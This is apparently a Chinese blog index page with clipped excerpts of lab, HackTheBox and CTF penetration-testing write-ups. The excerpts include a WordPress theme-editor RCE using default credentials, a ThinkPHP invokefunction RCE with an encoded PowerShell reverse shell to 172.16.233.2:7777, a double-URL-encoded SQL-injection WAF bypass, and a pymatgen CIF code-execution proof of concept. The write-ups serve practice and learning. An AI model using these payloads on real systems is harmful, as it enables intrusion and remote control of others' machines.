flag01上来一个 wordpress。 /wp-admin路由是后台管理,admin:123456登录。 修改当前主题 404 模板 RCE. 1http://39.99.150.53/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone 这个改了之后在渲染之后的页面没法进行传参连接,必须用模板 php 访问。 1234# 这个不行http://39.99.150.53/index.php/123/# 这个可以http://39.99.150.53/wp-content/themes/twentytwentyone/404.php 这个要是没文档得 wpscan 扫一下。 蚂蚁的剑连上之后直接 vshell 上线。 flag02123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737 ...
入口:39.101.76.98 扫下: 123456789101112131415161718192021[2025-03-04 18:33:08] [INFO] 暴力破解线程数: 1[2025-03-04 18:33:08] [INFO] 开始信息扫描[2025-03-04 18:33:08] [INFO] 最终有效主机数量: 1[2025-03-04 18:33:08] [INFO] 开始主机扫描[2025-03-04 18:33:09] [INFO] 有效端口数量: 233[2025-03-04 18:33:09] [SUCCESS] 端口开放 39.101.76.98:80[2025-03-04 18:33:09] [SUCCESS] 端口开放 39.101.76.98:22[2025-03-04 18:33:09] [SUCCESS] 服务识别 39.101.76.98:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH- ...
192.168.10.65 梦想 cms lmxcms 代码审计-mvc 架构练手首选 > 梦想 cms(lmxcms)1.41 版本下载_梦想 cms(lmxcms) mvc 架构:从源码路径 c 和 m 部分可以看出。需要找到路由 有安全狗。得绕过 waf。 双重 url 加密可以绕过。 12341'and updatexml(0,concat(0x7e,user()),1)#%25%33%31%25%32%37%25%36%31%25%36%65%25%36%34%25%32%30%25%37%35%25%37%30%25%36%34%25%36%31%25%37%34%25%36%35%25%37%38%25%36%64%25%36%63%25%32%38%25%33%30%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%37%35%25%37%33%25%36%35 ...
趁着免费正好来打一波 第一台http://172.20.56.32/ 上来一个 php: nday 一把嗦 1http://172.20.56.32//?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 写马没写上,猜测有杀毒。 1tasklist /svc 开了 360 和 wd。一会找个过免杀的项目。 反弹 shell工具似乎有点问题,手动把 shell 弹出来。 12345678910GET //?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell+-nop+-c+%22%24client+%3D+New-Object+System.Net.Sockets.TCPClient%28%27172.16.233.2%27%2C7777%29%3 ...
写在之前Season7 开始了。这个靶机提供了两个服务rose / KxEPkKe6R8su 这个靶机上来被 xp_cmdshell 非预期了,过了挺长时间才找到一份解决了的 Wp,这里学习下。 不懂为什么是 EZ、感觉和之前那个 Infiltrator 一个难度。 信息收集123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778nmap -sV -sC -O 10.10.11.51Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 23:26 CSTNmap scan report for 10.10.11.51Host is up (0.16s latency).Not shown: 988 filtered tcp ports (no-response)PORT STATE S ...
信息搜集12./fscan -h 10.10.11.38 -p 1-65535 5000有web服务 5000 Arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string 按照上面的漏洞链接创建 poc 文件: 12345678910111213data_5yOhtAoR_audit_creation_date 2018-06-08_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"loop__parent_propagation_vector.id_parent_propagation_vector.kxkykzk1 [0 0 0]_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ( ...
有事情来着,所以没及时做完。 信息搜集12345678start infoscan10.10.11.37:80 open10.10.11.37:22 open[*] alive ports len is: 2start vulscan[*] WebTitle http://10.10.11.37 code:301 len:304 title:301 Moved Permanently 跳转url: http://instant.htb/[*] WebTitle http://instant.htb/ code:200 len:16379 title:Instant Wallet android 逆向通过获取到的官网的 apk 可以获取到 api: 1http://mywalletv1.instant.htb/api/v1/view/profile 后面还提供了一个 Auth: 1eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVj ...
额,不太懂这个靶机为什么这么这么的卡。suid 利用的不太会。 信息搜集12345678start infoscan10.10.11.36:22 open10.10.11.36:80 open[*] alive ports len is: 2start vulscan[*] WebTitle http://10.10.11.36 code:302 len:0 title:None 跳转url: http://yummy.htb/已完成 2/2[*] 扫描结束,耗时: 51.404375599s 扫下目录: 1234567891011121314151617gobuster dir -u http://yummy.htb/ -w /usr/share/wordlists/dirb/common.txt===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@f ...
ezRender Hint: ulimit -n =2048 cat /etc/timezone : UTC ulimit 特性源码 User.py中的写法刚开始给我看一愣,主要是 handler 和 setSecret 这两部分到底是什么意思。handler 打开/dev/random的句柄,setSecret 获取开头的 22 个字节,然后 hex 。 123456789101112131415161718192021import timeclass User(): def __init__(self,name,password): self.name=name self.pwd = password self.Registertime=str(time.time())[0:10] self.handle=None self.secret=self.setSecret() def handler(self): self.handle = open(&quo ...
信息搜集12345678910start infoscan10.10.11.35:445 open10.10.11.35:135 open10.10.11.35:139 open10.10.11.35:88 open[*] alive ports len is: 4start vulscan已完成 4/4[*] 扫描结束,耗时: 7.961433112s host 加一下。 USERsmb 信息泄露注意到 445,尝试 smbclient 连接一下,先看下目录。 1smbclient -L 10.10.11.35 其中的 HR 可以连接并获取目录,其他的没有读取权限。 注意这里下载是用 get 命令。 1get "Notice from HR.txt" 本地浏览下: 1234567891011121314151617181920212223Dear new hire!Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security ...
